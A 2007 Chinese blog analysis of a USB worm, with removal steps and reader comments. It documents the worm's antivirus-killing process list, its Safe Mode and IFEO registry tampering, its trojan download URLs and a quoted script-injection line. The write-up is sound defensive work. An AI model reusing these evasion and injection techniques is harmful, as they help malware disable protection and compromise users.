随机8位数字和字母组合的恶性U盘Bing Du的分析

查看文章

2007-05-26 11:47

以下情况是本人测试所得，如需转帖，请注明作者（清新阳光）
和出处http://hi.baidu.com/newcenturysun/blog/item/2ad3d7cedcea3c0292457e2c.html
谢谢！

由于病毒屏蔽带有“病毒”字样的窗口所以改一下帖子的名字
最近发现很多人出现了打不开杀毒软件反病毒工具甚至带有病毒字样的窗口今天就接到了这样的一个样本先前

我发的那个一个坏事做绝的U盘病毒应该就是这个但今天收到的是新变种
这是一个可以说结合了几乎所有病毒的特征的病毒除了感染文件之外可以说是比熊猫有过之而无不及！
病毒特征：
1.破坏安全模式
2.结束常见杀毒软件以及反病毒工具进程
3.监控窗口
4.关闭自动更新以及Windows安全中心
5.屏蔽显示隐藏文件
6.下载木马
7.IFEO映像劫持

分析报告
File: 1201AEC1.exe
Size: 36435 bytes
MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB
SHA1: E760703C8776C652B424FA62AF945434FB786BE5
CRC32: 27CA1195
加壳方式：UPX
病毒运行后
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文

件名的dll 和一个同名的dat 文件
我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
这个随机的数字应该与机器码有关
该dll插入Explorer进程 Timplatform以及ctfmon进程

监视并关闭以下进程以及窗口
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
Google
baidu
P4P
Sogou PXP
ardsys
超级兔子木马
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLive.EXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep.
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avp.com.
krepair.COM
KaScrScn.SCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
duba
kingsoft
360safe
木马
木馬
病毒
杀毒
殺毒
查毒
防毒
反病毒
专杀
專殺
卡巴斯基
江民
瑞星
卡卡社区
金山毒霸
毒霸
金山社区
360安全
恶意软件
流氓软件
举报
报警
杀软
殺軟
防駭

在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件
在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件
删除C:\WINDOWS\system32\verclsid.exe
将其重命名为verclsid.exe.bak

注册表相关操作
删除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式

修改

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值

为0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001
屏蔽显示隐藏文件

修改常见杀毒软件服务的start键值为0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004
关闭自动更新

添加IFEO映像劫持项
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe

被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件

下载dl1.exe到临时文件夹
启动IE连接219.152.120.37:80

首先下载http://google.xxxx38.org/update/down.txt看病毒主文件（也就是那个8位随机数字或者字母的文件）是否需要更新
如果需要更新则下载http://google.xxxx38.org/update/update.exe更新自身

然后分别下载http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe 到program files 文件夹并把他们命名为ycnt1.exe~ycnt10.exe

具体每个文件的生成物就不一一列举了
不过值得一提的是ycnt9.exe这个木马
他生成C:\WINDOWS\system32\win1ogo.exe
并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗
插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码
也就是局域网内所有用户在打开网页时都会被插入这段代码

所有木马文件植入完毕后生成物如下
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
sreng日志反映如下（在处理一些东西后扫描的这里提前列出）

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe>                []
                  <Kvsc><C:\WINDOWS\Kvsc3.exe>                []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
                  <{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft

Shared\MSINFO\41115BDD.dll>                []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
                  <Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,>                [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE]                [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]

解决办法如下：

1.确定那个8位随机数的dll的名称
这里我们选用winrar确定那个dll的名称
方法是：打开winrar.exe
工具查看文件
在上面的地址栏中进入c:\program files\common files\microsoft shared\msinfo目录
（如图1）
我这台被感染的电脑的文件名为41115bdd.dll

2.使用强制删除工具删除那个dll文件
这里我们选用Xdelbox1.2这个软件
具体使用方法见http://hi.baidu.com/teyqiu/blog/item/291690efc3f3b5eece1b3e5a.html（里面有下载地址）

重起机器后
3.恢复被映像劫持的软件
这里我们使用autoruns这个软件 http://www.skycn.com/soft/17567.html
由于这个软件也被映像劫持了所以我们随便把他改个名字
打开这个软件后找到Image hijack (映像劫持）
删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000 Microsoft

Corporation c:\windows\system32\ntsd.exe
以外的所有项目

4.此时我们就可以打开sreng了呵呵
打开sreng
系统修复高级修复点击修复安全模式在弹出的对话框中点击是

5.恢复显示隐藏文件

把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

好了此时病毒对于我们的所有限制已经解除了
下面就是清除其下载的木马了
重起机器进入安全模式

打开sreng 启动项目注册表删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []

双击Userinit 把其键值改为C:\WINDOWS\system32\userinit.exe,

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

[CelInDrv / CelInDrv][Stopped/Disabled]
<\??\C:\WINDOWS\system32\Drivers\CelInDriver.sys><N/A>

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件

（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
然后删除
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat（随机8位数字字母组合）
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm（随机8位数字字母组合）
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\41115BDD.hlp（随机8位数字字母组合）
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话）

最后也是最重要的就是删除各个分区下面的autorun.inf和8位随机数的exe
一定不要双击也不能右键打开（因为那个autorun.inf编辑的比较巧妙，所以右键菜单无原先的auto等字样）所以一定用winrar或者冰刃删除!!!!

5.26 update:刚刚发现病毒主程序更新了
新版本的主程序的相关信息
File: update.exe
Size: 36435 bytes
MD5: 981A3D735B65F85ADF72EB00CBE7E342
SHA1: F96C27CA5D8380D07C571CB4A5EA95838E1C8B92
CRC32: EB10E247

并且下载的木马也有变化
http://google.xxxx38.org/update/1.exe 有变化新病毒的版本为2007-5-26-21：50的版本
清除方法已经更新

update:又出现了新变种分析在http://hi.baidu.com/newcenturysun/blog/item/3f7b424e42983908b3de0596.html

update:关闭winrar的变种分析

http://hi.baidu.com/newcenturysun/blog/item/76c1e41ffb59c4f4e0fe0bc6.html

类别：病毒防范与杀除 | 添加到搜藏 | 浏览() | 评论 (158)

最近很流行这个

2007-05-26 22:21

汗！看来现在的病毒越来越BT了...

2007-05-26 23:52

autoruns打不开怎么办？

2007-05-27 12:51

[回复三楼的]autoruns打不开怎么办

改名

2007-05-27 17:35

感染: 病毒 Packed.Win32.Klone.af 和Trojan.win32.Patched.v怎么解决
急死我了

2007-05-27 18:03

前几天我帮一个人弄这个病毒
弄不掉
到现在才知道这个病毒该怎么办
学习了~

2007-05-27 19:56

哎这次我可算是赶上个流行了

中了中了郁闷

2007-05-27 20:55

先转了..........
谢!!!!!1

2007-05-27 21:43

你居然说自己赶上流行,受不了,
就怕这个了,,,郁闷啊
正在解决中......

2007-05-28 11:28

这个病毒感染后根本无法显示隐藏文件，而且杀毒和其他优化软件都不能用，有一个傻B 方法，你把自己的所有磁盘共享，并允许网络用户更改你的文件，然后局域网内的其他电脑的杀毒软件扫描查杀病毒，在每个盘里有一个名为4E4Z。。。（名字记不太清楚了）的文件，把这个文件杀干净就行了，呵呵自己的电脑不能杀可以借助别人的杀毒软件杀毒哈哈我这样搞定的没有技术含量
菜鸟也很容易解决

2007-05-28 19:58

请问楼主autoruns这个软件改了名字也打不开啊!!

怎么办啊?

2007-05-28 20:46

晕.楼主,我把c:\windows\system32\ntsd.exe 这个用那个软件给删除了

怎么办.没什么大问题吗?

2007-05-28 23:10

有问题那个东西不能删的

2007-05-29 00:01

大哥,太感谢你了,我已经按照你的方法做完了整套工作,但是现在有2个小问题,第一个,你上面讲到的几个文件,我机子上一直找不到,比如说
C:\WINDOWS\system32\Kvsc3. msdebug.dll nwiztlbu.exe Packet.dll
RemoteDbg.dll testdll WanPacket.win1ogo.exe windds32.dll winpcap.exe wpcap.dll xpdhcp.dll LYLOADER.EXE LYMANGR.DLL
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]下的
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
双击Userinit 把其键值改为C:\WINDOWS\system32\userinit.exe,
[CelInDrv / CelInDrv][Stopped/Disabled]
<\??\C:\WINDOWS\system32\Drivers\CelInDriver.sys><N/A>
以上的步骤,这些我机器上都没有.在我机器上也找不到那些文件.我打开这个程序按步骤一样的做,但是就是没有上面的几个文件!
第二就是我重新启动之后,进不了系统,到了快进入的时候会弹出一个对话框上面显示"终结点格式无效"的字样!我现在在重新安装系统!
以上的问题我不太明白,希望您能帮忙了解一下!
非常感谢您的文章,收益非浅!!!!!感谢!!!!!

2007-05-29 00:05

对了,我想再补充一小点,呵呵!假如我按照您上面所说的方法做完之后再安装系统(只格式化C盘,其他盘不动的情况下)病毒还会出现吗?比如安装完成之后,进入系统,点击D.E.F盘,还会出现以前的中招情况吗?我真的是怕了~~~这病毒太猛了!

2007-05-29 00:09

再次打开其他分区还会中毒
必须用winrar查看其他分区有无8位随机数字字母组合成的exe和autorun.inf如果有则将其删除

2007-05-29 00:38

把那个随机数字.dll的文件删掉，然后就用杀毒软件把其他的搞定，我今天中了，搞了我差不多3小时

2007-05-29 00:39

我在dos里改文件属性再删的

2007-05-29 01:32

is the virus evolute again? i tried the methods above but still cant show hidden files, n my start menu bar cant show opened windows...pls help me...

2007-05-29 09:03

我晕了。昨天搞了半天没搞好。结果重新装了系统。可是重装了问题还是存在啊.

楼主帮忙救救我吧!

2007-05-29 09:53

请问楼主.为什么我用sreng 高级修复老是失败啊

还有就是:
使用强制删除工具删除那个dll文件
这里我们选用Xdelbox1.2这个软件
具体使用方法见http://hi.baidu.com/teyqiu/blog/item/291690efc3f3b5eece1b3e5a.html（
这里能不能说的详细点。我不会删除啊!

谢谢了。

2007-05-29 10:47

谢谢LZ,不过好像在用SRENG修复安全模式是提示安全模式重置功能失败? 不知为何?请LZ帮忙啊,急!
QQ:93920258

2007-05-29 16:00

本文被【发掘网】病毒风向标采用，谢谢。

2007-05-29 18:26

谢谢楼主啊，真是好人。
不过在用sreng修复安全模式的时候都不成功，最后下载了一个safeboot的注册表文件重新导入才可以的
而且原来安装得杀毒软件和防火墙都无法正常工作了，重装程序后也有不少问题。
还有我电脑上的userinit键值似乎没有被改过

2007-05-29 21:59

能不能再简单一点哦

2007-05-30 08:55

我的电脑也是中了木马病毒....我用GHOST恢复系统后　可以用软件　。可是使用QQ或者上网相关程序就会自动....中招...

我想是不是其它盘还有相关启动程序.....￣＿￣！！！
非要全格电脑才可以吗！！
麻烦...请各位高手帮一下！！！是什么程序在幕后启动....

2007-05-30 17:02

非常谢谢楼主.我按照其步骤来,但是第4步sreng打不开,这是为何?请指教

2007-05-30 17:53

回复ky 之前的那个用autoruns恢复映像劫持项目作了么

2007-05-30 21:00

请问楼主autoruns这个软件改了名字也打不开啊!!

2007-05-30 21:27

先谢谢楼主提了这么好的方法，可是我的已经到了xdelbox1.2和sreng这两个软件都打不开的地步，楼主快点帮忙救火啊~~~

2007-05-30 22:16

我之前把我的资源共享了，用别人机子上的卡８杀了一边毒，不知道是不是这个原因才使autoruns这个软件改了名字也打不开啊，请楼住帮忙，万分感谢，我的是笔记本．

2007-05-31 01:43

谢谢LZ,不过好像在用SRENG修复安全模式是提示安全模式重置功能失败? 不知为何?请LZ帮忙啊~

2007-05-31 17:27

太感谢了,强烈支持你.
也强冽CAO那发病毒的!死去,CAO死你B的!!!

2007-05-31 23:39

有专杀没有啊.老师

2007-06-01 10:18

其他盘的8位生成文件用winrar不给删除怎么办?
重装系统还是不行

2007-06-01 11:40

惨啊，竟然碰到这么个鬼bingdu，烦死人了，楼主我每一步都按你说了做了，就是在用autoruns那个程序的时候，我点那个印象劫持，什么都没有出现。。。导致无法删除。。。因而也无法点开SRENG来修复安全模式。。。

2007-06-01 12:16

安全模式重置不了，用注册表文件.reg导入

autoruns运行的时候要等一会才能全出来，是一点一点出来的

autoruns改名了可以打开．倒是SRENG改名了也不能打开

2007-06-01 14:09

万分感谢，真的很不错，你应该成立网络救助公司，

2007-06-01 15:18

谢谢大人啦
不过我在启动项里死活找不到Userinit，好奇怪啊
所以最后一步没怎么完成，后来发现杀毒软件能用了，杀出一堆的病毒来

2007-06-01 17:11

LZ安全模式修复失败啊给解释一下好吗?

2007-06-01 17:13

12 网友:郁闷死了 - 2007-05-28 20:46晕.楼主,我把c:\windows\system32\ntsd.exe 这个用那个软件给删除了

